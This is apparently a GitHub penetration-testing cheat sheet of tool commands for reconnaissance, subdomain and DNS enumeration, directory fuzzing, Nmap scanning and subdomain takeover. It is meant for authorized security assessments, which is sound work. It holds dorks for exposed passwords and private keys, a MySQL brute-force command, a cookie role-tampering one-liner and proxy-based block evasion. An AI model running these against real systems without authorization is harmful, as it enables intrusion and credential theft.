ivan-sincek/penetration-testing-cheat-sheet

Last Updated: 2023-09-05 19:56:46

Work in progress...

License: MIT License

Languages: HTML, JavaScript, Java, PHP, ASP.NET, CSS, Classic ASP, Shell

Penetration Testing Cheat Sheet

This is more of a checklist for myself. May contain useful tips and tricks.

Everything was tested on Kali Linux v2023.1 (64-bit).

For help with any of the tools, run <tool_name> [-h | -hh | --help] or man <tool_name>.

Sometimes -h can be mistaken for a host or some other option. If that's the case, use -hh or --help instead, or read the manual with man.

Some tools do similar tasks, but get slightly different results. Run everything you can. Many tools complement each other!

Keep in mind that when neither a protocol nor a port number is specified in a URL, i.e. if you specify only somesite.com, some tools will default to the HTTP protocol and port 80.
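
If in doubt, you can normalize bare hostnames to explicit URLs before feeding them to such tools. A minimal Bash sketch (the HTTPS default and the helper name are my own assumptions):

```shell
# add_scheme: prepend https:// to any host that lacks a scheme (stdin -> stdout).
add_scheme() {
    while read -r host; do
        case "${host}" in
            http://*|https://*) printf '%s\n' "${host}" ;;
            *)                  printf 'https://%s\n' "${host}" ;;
        esac
    done
}

# Example: add_scheme < subdomains.txt > urls.txt
```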

If you haven't already, read the OWASP Web Security Testing Guide. The checklist can be downloaded here.

I highly recommend reading Common Security Issues in Financially-Orientated Web.

Websites that you should use while writing the report:

Future plans:

  • more email gathering tools,
  • Bash one-liner to transform people.txt into emails.txt, and emails.txt into usernames.txt,
  • more WordPress tools,
  • HTTP smuggling,
  • parameter pollution,
  • insecure object deserialization,
  • pre-shared key cracking,
  • email spoofing.
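
For instance, the planned people.txt to emails.txt transform could look something like this; it assumes one "Firstname Lastname" entry per line and a firstname.lastname@somedomain.com address format (both assumptions):

```shell
# people_to_emails: turn "Firstname Lastname" lines into email addresses.
people_to_emails() {
    awk -v domain="somedomain.com" 'NF == 2 { print tolower($1) "." tolower($2) "@" domain }'
}

# emails_to_usernames: strip the domain part from each address.
emails_to_usernames() {
    cut -d '@' -f 1
}

# Example:
# people_to_emails < people.txt > emails.txt
# emails_to_usernames < emails.txt > usernames.txt
```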

My other cheat sheets:

Table of Contents

0. Install Tools and Setup

1. Reconnaissance

2. Scanning/Enumeration

3. Gaining Access/Exploiting

4. Post Exploitation

5. Password Cracking

6. Social Engineering

7. Miscellaneous

0. Install Tools and Setup

Most tools can be installed with the Linux package manager:

apt-get update && apt-get -y install sometool

For more information visit www.kali.org/tools.


Some tools need to be downloaded and installed with Python:

python3 setup.py install

Some tools need to be downloaded and built with Golang, or installed directly:

go build sometool.go

go install -v github.com/user/sometool@latest

To set up Golang, run apt-get -y install golang, add the following lines to ~/.zshrc, and then run source ~/.zshrc:

export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH

If you use another shell, you might need to add these lines to ~/.bashrc, etc.


Some tools that come in the form of binaries or shell scripts can be moved to the /usr/bin/ directory for ease of use:

mv sometool.sh /usr/bin/sometool && chmod +x /usr/bin/sometool

Some tools need to be downloaded and run with Java (JRE):

java -jar sometool.jar

API Keys

A list of useful APIs to integrate into your tools:

User-Agents

Download a list of bot-safe User-Agents (requires scrapeops.io API key):

python3 -c 'import json, requests; open("./user_agents.txt", "w").write(("\n").join(requests.get("http://headers.scrapeops.io/v1/user-agents?api_key=SCRAPEOPS_API_KEY&num_results=100", verify = False).json()["result"]))'

DNS Resolvers

Download a list of trusted DNS resolvers (or manually from github.com/trickest/resolvers):

python3 -c 'import json, requests; open("./resolvers.txt", "w").write(requests.get("https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt", verify = False).text)'

ProxyChains-NG

If Google or any other search engine or service blocks your tool, use ProxyChains-NG and Tor to bypass restrictions.

Installation:

apt-get update && apt-get -y install proxychains4 tor torbrowser-launcher

Make the following changes to the /etc/proxychains4.conf file:

round_robin
chain_len = 1
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 9050

Make sure to comment out any chain type other than round_robin, e.g. comment out strict_chain.
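
The edit can also be scripted; a small sketch, assuming the stock config still has strict_chain enabled and round_robin commented out:

```shell
# enable_round_robin: comment out strict_chain and uncomment round_robin
# in the given ProxyChains-NG config file.
enable_round_robin() {
    sed -i -e 's/^strict_chain/#strict_chain/' -e 's/^#round_robin/round_robin/' "$1"
}

# Example: enable_round_robin /etc/proxychains4.conf
```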

Don't forget to start Tor:

service tor start

Then, run any tool you want:

proxychains4 sometool

Using only Tor most likely won't be enough; you will need to add more proxies (1)(2) to the /etc/proxychains4.conf file. However, it is hard to find free and stable proxies that are not already blacklisted.

Download a list of free proxies:

curl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | jq -r '.data[] | "\(.protocols[]) \(.ip) \(.port)"' > proxychains.txt

curl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | jq -r '.data[] | "\(.protocols[])://\(.ip):\(.port)"' > proxies.txt

1. Reconnaissance

Keep in mind that some websites are accessible only through older web browsers such as Internet Explorer.

Keep in mind that some websites may be missing the index page and may not redirect you to the home page at all. If that's the case, try to manually guess a full path to the home page, use the Wayback Machine (gau) to find old URLs, or try directory fuzzing with DirBuster.

Search the Internet for default paths and files for a specific web application. Use the gathered information in combination with Google Dorks or httpx to find the same paths/files on different websites. For not so common web applications, try to find and browse the source code for default paths/files.

You can find the application's source code on GitHub, GitLab, searchcode, etc.

Search the application's source code for API keys, SSH keys, credentials, tokens, hidden hosts and domains, etc. Don't forget to check old GitHub commits for old but still active API keys, secret tokens, etc.

Inspect the web console for possible errors. Inspect the application's source code for possible comments.

Don't forget to access the web server over its IP address, because you may find the server's default welcome page or some other content.

1.1 Useful Websites

Dmitry

Gather information:

dmitry -wines -o dmitry_results.txt somedomain.com

Deprecated. Netcraft search does not work.

theHarvester

Gather information:

theHarvester -f theharvester_results.xml -b baidu,bevigil,bing,bingapi,certspotter,crtsh,dnsdumpster,duckduckgo,hackertarget,otx,threatminer,urlscan,yahoo -l 500 -d somedomain.com

This tool changes its supported search engines quite often; as such, some of them might not work as of this reading.

Sometimes the output file might default to /usr/lib/python3/dist-packages/theHarvester/ directory.

Extract hostnames from the results:

grep -Po '(?<=\<host\>)(?!\<(?:ip|hostname)\>)[^\s]+?(?=\<\/host\>)|(?<=\<hostname\>)[^\s]+?(?=\<\/hostname\>)' theharvester_results.xml | sort -uf | tee -a subdomains.txt

Extract IPs from the results:

grep -Po '(?<=\<ip\>)[^\s]+?(?=\<\/ip\>)' theharvester_results.xml | sort -uf | tee -a ips.txt

Extract emails from the results:

grep -Po '(?<=\<email\>)[^\s]+?(?=\<\/email\>)' theharvester_results.xml | sort -uf | tee -a emails.txt

FOCA (Fingerprinting Organizations with Collected Archives)

Find metadata and hidden information in files.

Tested on Windows 10 Enterprise OS (64-bit).

Setup:

GUI is very intuitive.

uncover

Installation:

go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest

Set your API keys in the /root/.config/uncover/provider-config.yaml file as follows:

shodan:
  - SHODAN_API_KEY
censys:
  - CENSYS_API_ID:CENSYS_API_SECRET
fofa: []

Gather information using Shodan, Censys, and more:

uncover -nc -json -o uncover_results.json -l 100 -e shodan,censys -q somedomain.com

jq '.host | select (. != "")' uncover_results.json | sort -uf | tee -a subdomains.txt

jq '.ip | select (. != "")' uncover_results.json | sort -uf | tee -a ips.txt

TO DO: Shodan and Censys Dorks.

assetfinder

Gather subdomains using OSINT:

assetfinder --subs-only somedomain.com | grep -v '*' | tee assetfinder_results.txt

Sublist3r

Gather subdomains using OSINT:

sublist3r -o sublister_results.txt -d somedomain.com

Subfinder

Gather subdomains using OSINT:

subfinder -silent -t 10 -timeout 3 -nW -o subfinder_results.txt -rL resolvers.txt -d somedomain.com

Subfinder has built-in DNS resolvers.

Set your API keys in the /root/.config/subfinder/config.yaml file as follows:

shodan:
  - SHODAN_API_KEY
censys:
  - CENSYS_API_ID:CENSYS_API_SECRET
github:
  - GITHUB_API_KEY
virustotal:
  - VIRUSTOTAL_API_KEY

Amass

Gather subdomains using OSINT:

amass enum -passive -o amass_results.txt -trf resolvers.txt -d somedomain.com

Amass has built-in DNS resolvers.

To find ASNs from IPs and CIDRs from ASNs, use WHOIS. The ASN and CIDR scans below will take a long time to finish. The results might not all be within your scope!

Gather subdomains by the ASN:

amass intel -o amass_asn_results.txt -trf resolvers.txt -asn 13337

Gather subdomains by the CIDR:

amass intel -o amass_cidr_results.txt -trf resolvers.txt -cidr 192.168.8.0/24

dig

Fetch name servers:

dig +noall +answer -t NS somedomain.com

Fetch exchange servers:

dig +noall +answer -t MX somedomain.com

Interrogate a domain name server:

dig +noall +answer -t ANY somedomain.com @ns.somedomain.com

Fetch the zone file from a domain name server:

dig +noall +answer -t AXFR somedomain.com @ns.somedomain.com

Reverse DNS lookup:

dig +noall +answer -x 192.168.8.5

[Subdomain Takeover] Check if domains/subdomains are dead or not, look for NXDOMAIN, SERVFAIL, or REFUSED status codes:

for subdomain in $(cat subdomains.txt); do res=$(dig "${subdomain}" -t A +noall +comments +timeout=3 | grep -Po '(?<=status\:\ )[^\s]+(?<!\,)'); echo "${subdomain} | ${res}"; done | sort -uf | tee -a subdomains_to_status.txt

grep -v 'NOERROR' subdomains_to_status.txt | grep -Po '[^\s]+(?=\ \|)' | sort -uf | tee -a subdomains_error.txt

grep 'NOERROR' subdomains_to_status.txt | grep -Po '[^\s]+(?=\ \|)' | sort -uf | tee -a subdomains_error_none.txt

Fierce

Interrogate domain name servers:

fierce -file fierce_std_results.txt --domain somedomain.com

fierce -file fierce_brt_results.txt --subdomain-file subdomains-top1mil.txt --domain somedomain.com

By default, Fierce will perform a brute force attack with its built-in wordlist.

DNSRecon

Interrogate domain name servers:

dnsrecon -t std --json /root/Desktop/dnsrecon_std_results.json -d somedomain.com

dnsrecon -t axfr --json /root/Desktop/dnsrecon_axfr_results.json -d somedomain.com

dnsrecon -v --iw -f --lifetime 3 --threads 50 -t brt --json /root/Desktop/dnsrecon_brt_results.json -D subdomains-top1mil.txt -d somedomain.com

DNSRecon can perform a brute force attack with a user-defined wordlist, but make sure to specify a full path to the wordlist; otherwise, DNSRecon might not recognize it.

Make sure to specify a full path to the output file; otherwise, it will default to the /usr/share/dnsrecon/ directory (i.e. the tool's root directory).

Extract hostnames from the standard/zone transfer/brute force results:

jq -r '.[] | if (.type == "A" or .type == "AAAA" or .type == "CNAME" or .type == "MX" or .type == "NS" or .type == "PTR") then (.exchange, .name, .target) else (empty) end | select(. != null)' dnsrecon_std_results.json | sort -uf | tee -a subdomains.txt

Extract IPs from the standard/zone transfer/brute force results:

jq -r '.[] | if (.type == "A" or .type == "AAAA" or .type == "CNAME" or .type == "MX" or .type == "NS" or .type == "PTR") then (.address) else (empty) end | select(. != null)' dnsrecon_std_results.json | sort -uf | tee -a ips.txt

[Subdomain Takeover] Extract canonical names from the standard/zone transfer/brute force results:

jq -r '.[] | if (.type == "CNAME") then (.target) else (empty) end | select(. != null)' dnsrecon_std_results.json | sort -uf | tee -a cnames.txt

Reverse DNS lookup:

dnsrecon --json /root/Desktop/dnsrecon_reverse_results.json -s -r 192.168.8.0/24

Extract virtual hosts from the reverse DNS lookup results:

jq -r '.[] | if (type == "array") then (.[].name) else (empty) end | select(. != null)' dnsrecon_reverse_results.json | sort -uf | tee -a subdomains.txt

host

Some DNS servers will not respond to DNS queries of type 'ANY'; use type 'A' instead.

Gather IPs for the given domains/subdomains (ask for A records):

for subdomain in $(cat subdomains.txt); do res=$(host -t A "${subdomain}" | grep -Po '(?<=has\ address\ )[^\s]+(?<!\.)'); if [[ ! -z $res ]]; then echo "${subdomain} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a subdomains_to_ips.txt

grep -Po '(?<=\|\ )[^\s]+' subdomains_to_ips.txt | sort -uf | tee -a ips.txt

Check if domains/subdomains are alive or not with httpx. Check if IPs are alive or not with Nmap.

Gather virtual hosts for the given IPs (ask for PTR records):

for ip in $(cat ips.txt); do res=$(host -t PTR "${ip}" | grep -Po '(?<=domain\ name\ pointer\ )[^\s]+(?<!\.)'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_subdomains.txt

grep -Po '(?<=\|\ )[^\s]+' ips_to_subdomains.txt | sort -uf | tee -a subdomains.txt

[Subdomain Takeover] Gather canonical names for the given domains/subdomains (ask for CNAME records):

for subdomain in $(cat subdomains.txt); do res=$(host -t CNAME "${subdomain}" | grep -Po '(?<=is\ an\ alias\ for\ )[^\s]+(?<!\.)'); if [[ ! -z $res ]]; then echo "${subdomain} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a subdomains_to_cnames.txt

grep -Po '(?<=\|\ )[^\s]+' subdomains_to_cnames.txt | sort -uf | tee -a cnames.txt

WHOIS, ASN, CIDR

Gather ASNs for the given IPs:

for ip in $(cat ips.txt); do res=$(whois -h whois.cymru.com "${ip}" | grep -Poi '^\d+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_asns.txt

grep -Po '(?<=\|\ )(?:(?!\ \|).)+' ips_to_asns.txt | sort -uf | tee -a asns.txt

Gather CIDRs for the given ASNs:

for asn in $(cat asns.txt); do res=$(whois -h whois.radb.net -i origin "AS${asn}" | grep -Poi '(\b25[0-5]|\b2[0-4][0-9]|\b[01]?[0-9][0-9]?)(\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}\/[0-9]+'); if [[ ! -z $res ]]; then echo "AS${asn} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a asns_to_cidrs.txt

grep -Po '(?<=\|\ )(?:(?!\ \|).)+' asns_to_cidrs.txt | sort -uf | tee -a cidrs.txt

[Subdomain Takeover] Gather organization names (and more) for the given IPs:

for ip in $(cat ips.txt); do res=$(whois -h whois.arin.net "${ip}" | grep -Po '(?<=OrgName\:)[\s]+\K.+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_organization_names.txt

grep -Po '(?<=\|\ )(?:(?!\ \|).)+' ips_to_organization_names.txt | sort -uf | tee -a organization_names.txt

Check if any IP belongs to the GitHub organization; more info about GitHub takeover can be found in this article.

httpx

Check if domains/subdomains are alive or not (map live hosts):

httpx-toolkit -o subdomains_live.txt -l subdomains_error_none.txt

httpx-toolkit -random-agent -json -o httpx_results.json -threads 100 -timeout 3 -l subdomains.txt -ports 80,443,8008,8080,8403,8443,9008,9080,9403,9443

Filter domains/subdomains from the JSON results:

jq -r '.url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_live_long.txt

grep -Po 'http\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_http.txt

grep -Po 'https\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_https.txt

grep -Po '(?<=\:\/\/)[^\s\:]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live.txt

jq -r 'select(."status-code" >= 200 and ."status-code" < 300) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_2xx.txt

jq -r 'select(."status-code" >= 300 and ."status-code" < 400) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_3xx.txt

jq -r 'select(."status-code" < 300 or ."status-code" >= 400) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_3xx_none.txt

jq -r 'select(."status-code" >= 400 and ."status-code" < 500) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_4xx.txt

jq -r 'select(."status-code" == 401) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_401.txt

jq -r 'select(."status-code" == 403) | .url | select(. != null)' httpx_results.json | sort -uf | tee -a subdomains_403.txt

Check if a directory exists on a web server:

httpx-toolkit -status-code -content-length -o httpx_results.txt -l subdomains_live.txt -path /.git

gau

Gather URLs from the wayback machine:

getallurls somedomain.com | tee gau_results.txt

for subdomain in $(cat subdomains_live.txt); do getallurls "${subdomain}"; done | sort -uf | tee gau_results.txt

Filter URLs from the results:

httpx-toolkit -random-agent -json -o httpx_gau_results.json -threads 100 -timeout 3 -r resolvers.txt -l gau_results.txt

jq -r 'select(."status-code" >= 200 and ."status-code" < 300) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_2xx_results.txt

jq -r 'select(."status-code" >= 300 and ."status-code" < 400) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_3xx_results.txt

jq -r 'select(."status-code" >= 400) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_4xx_results.txt

jq -r 'select(."status-code" == 401) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_401_results.txt

jq -r 'select(."status-code" == 403) | .url | select(. != null)' httpx_gau_results.json | sort -uf | tee gau_403_results.txt

urlhunter

Installation:

go install -v github.com/utkusen/urlhunter@latest

Gather URLs from URL shortening services:

urlhunter -o urlhunter_results.txt -date latest -keywords keywords.txt

Google Dorks

Google Dorks databases:

Check the list of /.well-known/ files here.

Google Dorking will not show directories or files that are disallowed in robots.txt; to check for such directories and files, use httpx.

Append site:www.somedomain.com to limit your scope to a specified domain/subdomain. Append site:*.somedomain.com to limit your scope to all subdomains. Append site:*.somedomain.com -www to exclude www subdomain from results.
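
When testing many domains at once, these scoping operators can be generated in bulk; a minimal sketch (the base dork and file names are placeholders):

```shell
# gen_dorks: append a site: scope (excluding www) to a base dork
# for every domain read from stdin.
gen_dorks() {
    base="$1"
    while read -r domain; do
        printf '%s site:*.%s -www\n' "${base}" "${domain}"
    done
}

# Example: gen_dorks 'inurl:/robots.txt intext:disallow ext:txt' < domains.txt
```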

Simple Google Dorks examples:

inurl:/robots.txt intext:disallow ext:txt

inurl:/.well-known/security.txt ext:txt

inurl:/info.php intext:"php version" ext:php

intitle:"index of /" intext:"parent directory"

intitle:"index of /.git" intext:"parent directory"

inurl:/gitweb.cgi

intitle:"Dashboard [Jenkins]"

(intext:"mysql database" AND intext:db_password) ext:txt

intext:-----BEGIN PGP PRIVATE KEY BLOCK----- (ext:pem OR ext:key OR ext:txt)

Chad

Find and download files using Google Dorks:

chad -sos no -d chad_results -tr 100 -q "ext:txt OR ext:pdf OR ext:doc OR ext:docx OR ext:xls OR ext:xlsx" -s *.somedomain.com -o chad_results.json

Extract authors (and more) from the files:

apt-get -y install libimage-exiftool-perl

exiftool -S chad_results | grep -Po '(?<=Author\:\ ).+' | sort -uf | tee -a people.txt

Run a single Google Dork:

chad -sos no -q 'intitle:"index of /" intext:"parent directory"' -s *.somedomain.com

For advanced use and automation, check the project page.

git-dumper

Try to reconstruct a Git repository (i.e. get the source code) based on the commit history from a publicly accessible /.git directory:

git-dumper https://somesite.com/.git git_dumper_results

This tool might not always be able to reconstruct the whole repository, but it could still reveal some sensitive information.

Some additional git commands to try on the cloned /.git directory:

git status

git log

git checkout -- .

git restore .

Use Google Dorking and Chad to find more targets.

TruffleHog

Installation:

git clone https://github.com/trufflesecurity/trufflehog && cd trufflehog

go install

Search for sensitive keys inside a single repository or the whole organization on GitHub:

trufflehog git https://github.com/trufflesecurity/test_keys --only-verified --json

trufflehog github --org=trufflesecurity --only-verified --json

Search for sensitive keys inside files and directories:

trufflehog filesystem somefile_1.txt somefile_2.txt somedir1 somedir2

For more usage, check github.com/trufflesecurity/trufflehog.

Directory Fuzzing

Don't forget that GNU/Linux has a case-sensitive file system, so make sure to use appropriate wordlists.
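
If only a mixed-case wordlist is at hand, it can be lowercased and deduplicated first; for example:

```shell
# lowercase_wordlist: lowercase every entry and drop duplicates (stdin -> stdout).
lowercase_wordlist() {
    tr '[:upper:]' '[:lower:]' | sort -u
}

# Example: lowercase_wordlist < wordlist.txt > wordlist_lowercase.txt
```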

If you don't get any hits while brute forcing directories, try to brute force files by specifying file extensions.

The following tools support recursive directory search and file search; they might also take a long time to finish, depending on the settings and the wordlist used.

Find out how to bypass 4xx HTTP response status codes from my other project.

DirBuster

DirBuster

Figure 1 - DirBuster

All DirBuster's wordlists are located in the /usr/share/dirbuster/wordlists/ directory.

feroxbuster

Brute force directories on a web server:

cat subdomains_live_long.txt | feroxbuster -q --auto-bail --random-agent -t 50 -T 3 -k -n --stdin -o feroxbuster_results.txt -s 200,301,302,401,403 -w directory-list-lowercase-2.3-medium.txt

This tool seems to be faster than DirBuster.

Filter directories from the results:

grep -Po '(?<=200)\K.+\K(?<=c\ )[^\s]+' feroxbuster_results.txt | sort -uf | tee -a directories_200.txt

grep -Po '(?<=301|302)\K.+\K(?<=c\ )[^\s]+' feroxbuster_results.txt | sort -uf | tee -a directories_3xx.txt

grep -Po '(?<=401)\K.+\K(?<=c\ )[^\s]+' feroxbuster_results.txt | sort -uf | tee -a directories_401.txt

grep -Po '(?<=403)\K.+\K(?<=c\ )[^\s]+' feroxbuster_results.txt | sort -uf | tee -a directories_403.txt

Option Description
-u The target URL (required, unless [--stdin | --resume-from] is used)
--stdin Read URL(s) from STDIN
-a/-A Sets the User-Agent (default: feroxbuster/2.7.3) / Use a random User-Agent
-x File extension(s) to search for (ex: -x php -x pdf,js)
-m Which HTTP request method(s) should be sent (default: GET)
--data Request's body; can read data from a file if input starts with an @(ex: @post.bin)
-H Specify HTTP headers to be used in each request (ex: -H header:val -H 'stuff:things')
-b Specify HTTP cookies to be used in each request (ex: -b stuff=things)
-Q Request's URL query parameters (ex: -Q token=stuff -Q secret=key)
-f Append / to each request's URL
-s Status Codes to include (allow list) (default: 200,204,301,302,307,308,401,403,405)
-T Number of seconds before a client's request times out (default: 7)
-k Disables TLS certificate validation for the client
-t Number of concurrent threads (default: 50)
-n Do not scan recursively
-w Path to the wordlist
--auto-bail Automatically stop scanning when an excessive amount of errors are encountered
-B Automatically request likely backup extensions for "found" URLs
-q Hide progress bars and banner (good for tmux windows w/ notifications)
-o Output file to write results to (use w/ --json for JSON entries)

snallygaster

Download the latest version from GitHub. See how to install the tool.

Search a web server for sensitive files:

snallygaster --nowww somesite.com | tee snallygaster_results.txt

for subdomain in $(cat subdomains_live_long_http.txt); do snallygaster --nohttps --nowww "${subdomain}"; done | tee snallygaster_http_results.txt

for subdomain in $(cat subdomains_live_long_https.txt); do snallygaster --nohttp --nowww "${subdomain}"; done | tee snallygaster_https_results.txt

IIS Tilde Short Name Scanning

Download:

git clone https://github.com/irsdl/IIS-ShortName-Scanner && cd IIS-ShortName-Scanner/release

Search an IIS server for files and directories:

java -jar iis_shortname_scanner.jar 2 30 https://somesite.com

Bypassing 401 and 403

Find out how to bypass 4xx HTTP response status codes from my other project.

WhatWeb

Identify a website:

whatweb -v somesite.com

Parsero

Test all robots.txt entries:

parsero -sb -u somesite.com

EyeWitness

Grab screenshots from websites:

eyewitness --no-prompt --no-dns --timeout 3 --threads 5 -d eyewitness_results -f subdomains_live_long.txt

To check the screenshots, navigate to eyewitness_results/screens directory.

Wordlists

You can find rockyou.txt inside /usr/share/wordlists/ directory or inside SecLists - a useful collection of multiple types of wordlists for security assessments.

Install SecLists (the collection will be stored in the /usr/share/seclists/ directory):

apt-get update && apt-get install seclists

Other popular wordlist collections:

2. Scanning/Enumeration

Keep in mind that web applications can be hosted on other ports besides 80 (HTTP) and 443 (HTTPS), e.g. they can be hosted on port 8443 (HTTPS).

Keep in mind that on ports 80 (HTTP) and 443 (HTTPS) a web server can host different web applications or some other services entirely. Use Ncat or Telnet for banner grabbing.

Keep in mind that on different URL paths a web server can host different web applications or some other services entirely, e.g. somesite.com/app_one/ and somesite.com/app_two/.

While scanning for vulnerabilities or running any other intensive scans, periodically check the web application/service in case it has crashed, so you can alert your client as soon as possible. Also, you might often get temporarily blocked by a web application firewall (WAF) or some other security product, after which all your subsequent requests will be invalid.

If a web application all of a sudden stops responding, try to access it with your mobile data (i.e. use a different IP). It is possible that your current IP was temporarily blocked.

Send an email message to a non-existent address at the target's domain; it will often reveal useful internal network information through a non-delivery notification (NDN).

Try to invest in Nessus Professional and Burp Suite Professional, or any other similar premium tools, if you can afford them.

2.1 Useful Websites

Nmap

For better results, use IPs instead of domain names.

Some web servers will not respond to ping (ICMP) requests, so the mapping of the live hosts will not be accurate.

Ping sweep (map live hosts):

nmap -sn -oG nmap_ping_sweep_results.txt 192.168.8.0/24

nmap -sn -oG nmap_ping_sweep_results.txt -iL cidrs.txt

Extract live hosts from the results:

grep -Po '(?<=Host\:\ )[^\s]+' nmap_ping_sweep_results.txt | sort -uf | tee -a ips_live.txt

TCP scan (all ports):

nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- 192.168.8.0/24

nmap -nv -sS -sV -sC -Pn -oN nmap_tcp_results.txt -p- -iL cidrs.txt

[Variation] TCP scan (all ports):

mkdir nmap_tcp_results

for ip in $(cat ips_live.txt); do nmap -nv -sS -sV -sC -Pn -oN "nmap_tcp_results/nmap_tcp_results_${ip//./_}.txt" -p- "${ip}"; done

UDP scan (only important ports):

nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 192.168.8.0/24

nmap -nv -sU -sV -sC -Pn -oN nmap_udp_results.txt -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 -iL cidrs.txt

[Variation] UDP scan (only important ports):

mkdir nmap_udp_results

for ip in $(cat ips_live.txt); do nmap -nv -sU -sV -sC -Pn -oN "nmap_udp_results/nmap_udp_results_${ip//./_}.txt" -p 53,67,68,69,88,123,135,137,138,139,161,162,389,445,500,514,631,1900,4500 "${ip}"; done

Option Description
-sn Ping scan - disable port scan
-Pn Treat all hosts as online -- skip host discovery
-n/-R Never do DNS resolution/Always resolve (default: sometimes)
-sS/sT/sA TCP SYN/Connect()/ACK
-sU UDP scan
-p/-p- Only scan specified ports/Scan all ports
--top-ports Scan most common ports
-sV Probe open ports to determine service/version info
-O Enable OS detection
-sC Same as --script=default
--script Script scan (takes time to finish)
--script-args Provide arguments to scripts
--script-help Show help about scripts
-oN/-oX/-oG Output scan in normal, XML, and Grepable format
-v Increase verbosity level (use -vv or more for greater effect)
--reason Display the reason a port is in a particular state
-A Enable OS detection, version detection, script scanning, and traceroute

All Nmap's scripts are located in the /usr/share/nmap/scripts/ directory. Read more about the scripts here.

NSE examples:

nmap -nv --script='mysql-brute' --script-args='userdb="users.txt", passdb="rockyou.txt"' 192.168.8.5 -p 3306

nmap -nv --script='dns-brute' --script-args='dns-brute.domain="somedomain.com", dns-brute.hostlist="subdomains-top1mil.txt"'

nmap -nv --script='ssl-heartbleed' -iL cidrs.txt

You can find rockyou.txt and subdomains-top1mil.txt wordlists in SecLists.

I prefer to use Nuclei for vulnerability scanning.

Nikto

Scan a web server:

nikto -output nikto_results.txt -h somesite.com -p 80

WPScan

Scan a WordPress website:

wpscan -o wpscan_results.txt --url somesite.com

testssl.sh

Installation:

apt-get update && apt-get -y install testssl.sh

Test an SSL/TLS certificate (i.e. SSL/TLS ciphers, protocols, etc.):

testssl --openssl /usr/bin/openssl -oH testssl_results.html somesite.com

You can also use testssl.sh to exploit SSL/TLS vulnerabilities.

OpenSSL

Test a web server for Heartbleed vulnerability:

for subdomain in $(cat subdomains_live.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}:443" 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt

for subdomain in $(cat subdomains_live_long_https.txt); do res=$(echo "Q" | openssl s_client -connect "${subdomain}" 2>&1 | grep 'server extension "heartbeat" (id=15)'); if [[ ! -z $res ]]; then echo "${subdomain}"; fi; done | tee openssl_heartbleed_results.txt

keytool

Grab SSL/TLS certificate:

keytool -printcert -rfc -sslserver ebay.com > keytool_results.txt

openssl x509 -noout -text -in keytool_results.txt

Use uncover with certificate-related Shodan and Censys dorks to find more possibly in-scope hosts.

3. Gaining Access/Exploiting

Always try the null session login (i.e. no password login) or search the Internet for default credentials for a specific web application.

Try to manipulate cookies or tokens to gain access or elevate privileges.
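
For example, session cookies are sometimes just Base64-encoded JSON; decoding, tampering, and re-encoding is a quick check (the cookie content below is made up):

```shell
# Decode a Base64 cookie, swap the role claim, and re-encode it.
cookie='eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoidXNlciJ9'   # {"user":"guest","role":"user"}
echo "${cookie}" | base64 -d | sed 's/"role":"user"/"role":"admin"/' | base64 -w 0
```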

Try to change an HTTP POST request into an HTTP GET request (i.e. into a query string) and see if a server will accept it.

Turn off JavaScript in your web browser and check the web application behaviour again.

Check the web application behaviour on mobile devices, e.g. check m.somesite.com for vulnerabilities because some features might work differently.

If you want to automate your code injection testing, check the Wordlists sub-section for code injection wordlists. Most of the wordlists also include obfuscated code injections.

Don't forget to remove all the created artifacts after you are done testing.

3.1 Useful Websites

Collaborator Servers

Exploit open redirect, blind cross-site scripting (XSS), DNS/HTTP interaction, etc.

Subdomain Takeover

Gather as much information as you can for a specified target, see how in 1. Reconnaissance.

Gather organization names with WHOIS, and canonical names with host.

You can double check if domains/subdomains are alive or not with dig and httpx.

Check if hosting providers for the found domains/subdomains are vulnerable to domain/subdomain takeover at EdOverflow/can-i-take-over-xyz. Credits to the author!

Popular cloud service providers:

Subzy

Installation:

go install -v github.com/lukasikic/subzy@latest

Check for domains/subdomains takeover:

subzy -concurrency 100 -timeout 3 -targets subdomains.txt | tee subzy_results.txt

subjack

Installation:

go install -v github.com/haccer/subjack@latest

Check for domains/subdomains takeover:

subjack -v -o subjack_results.json -t 100 -timeout 3 -a -m -w subdomains.txt

Nuclei

Installation:

